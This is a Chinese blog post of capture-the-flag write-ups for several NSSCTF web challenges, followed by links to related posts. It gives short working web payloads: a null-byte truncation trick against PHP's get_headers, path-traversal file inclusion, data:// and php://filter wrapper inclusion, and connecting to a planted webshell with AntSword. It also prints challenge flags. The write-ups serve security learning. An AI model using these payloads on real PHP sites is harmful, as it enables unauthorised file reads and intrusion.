NSSCTF之Web篇刷题记录(13)_nssctfeasyuoload

于 2024-09-07 13:33:11 发布
阅读量308 收藏 10
点赞数 4
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_86950689/article/details/141994629
版权

然后蚁🗡连接在根目录下看到flag

在这里插入图片描述

在这里插入图片描述

NSSCTF{13452adb-4b78-4942-bdea-9f90c17d4507}

[GKCTF 2020]cve版签到:

在这里插入图片描述
PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的get_headers()函数存在安全漏洞(\0可以截断)。攻击者可利用该漏洞造成信息泄露

使用%00截断 说我们url请求必须包含.ctfhub.com F12 提示flag在本地,还告诉了我们主机名必须以123结尾

在这里插入图片描述
Payload:?url=http://127.0.0.123%00www.ctfhub.com

在这里插入图片描述

NSSCTF{80f1e680-dcd3-407f-b001-fe43442fed83}

[HCTF 2018]Warmup:

在这里插入图片描述
在这里插入图片描述

<?php
    highlight\_file(\_\_FILE\_\_);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is\_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in\_array($page, $whitelist)) {
                return true;
            }

            $\_page = mb\_substr(
                $page,
                0,
                mb\_strpos($page . '?', '?')
            );
            if (in\_array($\_page, $whitelist)) {
                return true;
            }

            $\_page = urldecode($page);
            $\_page = mb\_substr(
                $\_page,
                0,
                mb\_strpos($\_page . '?', '?')
            );
            if (in\_array($\_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($\_REQUEST['file'])
        && is\_string($\_REQUEST['file'])
        && emmm::checkFile($\_REQUEST['file'])
    ) {
        include $\_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

文件包含 Payload:file=hint.php?../../../../../ffffllllaaaagggg

在这里插入图片描述
在这里插入图片描述

NSSCTF{c5a0500a-bc52-40e2-b4e4-6155dc4ba55e}

[GDOUCTF 2023]泄露的伪装:

使用dirsearch 扫到了www.rar 打开文档有个路径 进行访问 然后就是代码审计

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

文件包含 根据代码审计以及file_get_contents读取文件内容函数我们可以知道我们需要传入一个文件,这里可以利用data://伪协议

Pyload:orzorz.php?cxk=data://text/plain,ctrl

在这里插入图片描述

NSSCTF{33af9a1f-f959-4d87-bdd0-e82ed1087876}

[羊城杯 2020]easycon:

一个Ubuntu默认页面访问index.php,提示eval post cmd应该是有一句话
直接蚁剑连接 🆗成功连接 发现bbbbbbbbb.txtBase64转图片

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

Base64转图片:https://tool.jisuapi.com/base642pic.html

在这里插入图片描述

NSSCTF{do_u_kn0w_c@idao}

[HNCTF 2022 Week1]Interesting_include:

在这里插入图片描述
直接文件包含flag.php使用伪协议?filter=php://filter/convert.base64-encode/resource=flag.php Base64解码即可。
在这里插入图片描述

NSSCTF{57b43a46-bd1c-4a2e-b15d-5bccff598016}

2401_86950689
关注
[NSSCTF]-Web:[SWPUCTF 2021 新生赛]easy_sql解析
2301_79326813的博客
02-10 979
注意,这里需要把wllm设置为不为1的数(就是让他查不到数据就行,因为wllm=1查得到数据),不然它只会输出wllm=1查询到的数据。得到数据库名称就可以按顺序数据库-表-列来找flag了。有提示,参数是wllm,并且要我们输入点东西。从上图看应该是字符型漏洞,单引号字符注入。所以,我们尝试以get方式传入。报错了,说明字段数是3。有回显,但似乎没啥用。
[HNCTF 2022 Week1]Interesting_include
s_hiy_iyi的博客
10-24 301
get一个filter变量,然后进行正则匹配,找flag关键字,include函数打开此文件。php://input用来执行php代码(post一段php代码)filter=flag.php,只会发现一片空白。目标对象resource=./flag.php。php://filter用来读取源码。
NSSCTF之Misc刷题记录
Aluxian_的博客
05-11 1992
[CISCN 2022 初赛]ez_usb [SWPUCTF 2021 新生赛]你喜欢osu吗? [SWPUCTF 2021 新生赛]Bill [SWPUCTF 2021 新生赛]二维码不止有二维码 [HGAME 2022 week1]好康的流量 [红明谷CTF 2022]MissingFile [广东省大学生攻防大赛 2021]这是道签到题 [羊城杯 2022]签个到
[GDOUCTF 2023]泄露的伪装
2301_80189829的博客
12-13 363
看到题目提示为php协议,进行目录扫描得到一个test.txt页面打开来。和一个orzorz.php页面。直接用Hackbar传参。
HNCTF 2022 week1 题解
m0_74057302的博客
04-25 448
自由才是生活主旋律。
NSSCTF刷题记录——[SWPUCTF 2021 新生赛]系列(WEB
jameshuangchuan的博客
08-08 2981
此处主要在NSSCTF平台()上开展刷题
NSSCTF 2nd WEB
ytl_storm的博客
09-25 353
当我们上传test.php/.这样的文件时候,因为file_put_contents()第一个参数是文件路径,操作系统会认为你要在test1.php文件所在的目录中创建一个名为.的文件,最后上传的结果就为test.php。这里绕过的主要原理是Tornado模板在渲染时会执行__tt_utf8(__tt_tmp) 这样的函数,所以将__tt_utf8设置为eval,然后将__tt_tmp设置为了从POST方法中接收的字符串导致了RCE。为具体的某个算法,则密钥是不能为空的。猜测这里存在SSRF漏洞。
NSSCTF刷题记录——[SWPUCTF 2021 新生赛]系列(REVERSE
jameshuangchuan的博客
08-10 2687
str.zfill(width)根据width长度对str进行切片,那么此题中的注释可以看出,result。真的麻,年轻时没有好好学习,后果就是一把年纪重新捡起这些玩意看到程序就头皮发麻……hex()用于将10进制整数转换成16进制,以字符串形式表示。ord()用来返回对应字符的ascii码。此处主要在NSSCTF平台(
NSSCTF刷题记录——[SWPUCTF 2021 新生赛]系列(CRYPTO
jameshuangchuan的博客
08-28 1093
刚经过reverse的折磨又来?分析可得原文经过了三层加密,按顺序分别是base64、base32、base16,那倒序逐层解密就完事了。看着像是MD5加密过的。字符串复制粘贴到在线MD5解密工具上跑吧。第一次提交flag把牵前面的b'带上了,报错,去掉之后就对了。刚好前段时间刷到到过一文章讲猪圈密码的,直接对着看就行。碰到UUEncode解密的时候出现了flag。感觉没看出来啥规律,只好拿出工具无脑碰运气。此处主要在NSSCTF平台(……得到flag是md5yyds。
NSSCTF刷题wp——Crypto入门
YougerXen的博客
04-10 2094
NSSCCTF Crypto 探索 Crypto入门 [鹤城杯 2021]easy_crypto ID:453 公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业平等民主公正诚信和谐公正文明公正爱国自由诚信自由平等文明公正诚信富强自由法治法治平等平等自由平等富强法治诚信和谐 社会主义核心价值观密码,直接解,在线工具 解出后得fl
[HFCTF2020]BabyUpload
nigo134的博客
06-04 1040
通过上传session文件伪造session。
[HNCTF 2022 Week1]Interesting_http
kuzemax的博客
04-21 333
[BJDCTF 2020]easy_md5、[HNCTF 2022 Week1]Interesting_include、[GDOUCTF 2023]泄露的伪装
最新发布
2401_82985722的博客
05-14 759
hint 是Oracle 提供的一种SQL语法,它允许用户在SQL语句中插入相关的语法,从而影响SQL的执行方式。php://filter/convert.base64-encode/resource=文件路径。=b,但是它们的MD5值相等,且此处为(==)弱比较类型。使用dirsearch扫描,发现状态码为200的/www.rar目录,url下载压缩包。但是它们的MD5值相等,且此处为(===)强比较类型,使用数组绕过。这也是or 1 = 1 的由来,所以在这里要尝试构造带or的参数。
文件上传漏洞
m0_70683009的博客
05-21 1202
如果对方中间件是apache属于低版本,我们可以利用文件上传,上传一个不识别的文件后缀,利用解析漏洞规则成功解析文件,其中的后门代码被执行。,可以被当作php文件进行解析,从最后一个.mmm开始,apache不认识,就往前走,一直到.php,这样即绕过了验证,有可以进行解析。⑤:不删除末尾的点,在后缀名加点(需要在抓到的数据包中加点,直接在文件后缀名加点会命名不成功,它会自动删除点)(2) 当上传文件.asp;上传可以上传的文件,在文件地址后加上/x.php,可以让文件以php代码去执行。
upload类型题目总结
limenzzz的博客
04-20 1296
你传你🐎呢
# NUSTCTF(校外赛道)2022-wp
Laffrey的专栏
11-12 1479
NUSTCTF(校外赛道)2022-wp
NSSCTF题解
网络安全爱好者,分享渗透测试、漏洞复现、src挖掘,靶场搭建知识和技巧
03-17 1190
首先看这个代码的逻辑,我们的可控点是content,同时可以写入文件进去,在unzip函数中extractTo可以解压/tmp的文件到$_SERVER['DOCUMENT_ROOT']."/static/upload/".md5($filename),然后经过一大堆过滤,最后就是unlink删除文件,所以我们可以进行条件竞争,在解压文件和删除文件进行竞争。就可以查询出flag。响应中的hash值随着name参数的变化而变化,但又不完全是md5加密的值,这里看提示后,直接构造payload
2022 SWPU新生赛&HNCTF web部分题目
weixin_63231007的博客
11-02 3573
SWPU在start.php 界面抓个包,发包得到:F1l1l1l1l1lag.phpThinkPHP V5 rce 漏洞在网上可以找到现成的payload替换whoami命令为我们要执行的命令即可反序列化构造 assert(eval($_POST[1]));cat /flag即可ez_1zpop之后把属性改大一位,绕过__wakeup()函数numgame查看js源码发现了NsScTf.php。
CTF笔记 个人HNCTF反思(部分题目)
qq_51248658的博客
10-31 2255
[WEEK2]easy_include、[WEEK2]easy_unser、[WEEK2]easy_sql、[WEEK2]ez_SSTI、[WEEK4]pop子和pipi美
nssctf的jwt问3
08-17
3. 请确保您已经导入 `java.awt.image抱歉,我无法回答有关 nssctf 的问题。我是一个与开发者有关的 AI,.BufferedImage` 和 `javax.imageio.ImageIO` 类。 您可以根据需要修改保存图片的路径和文件名。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值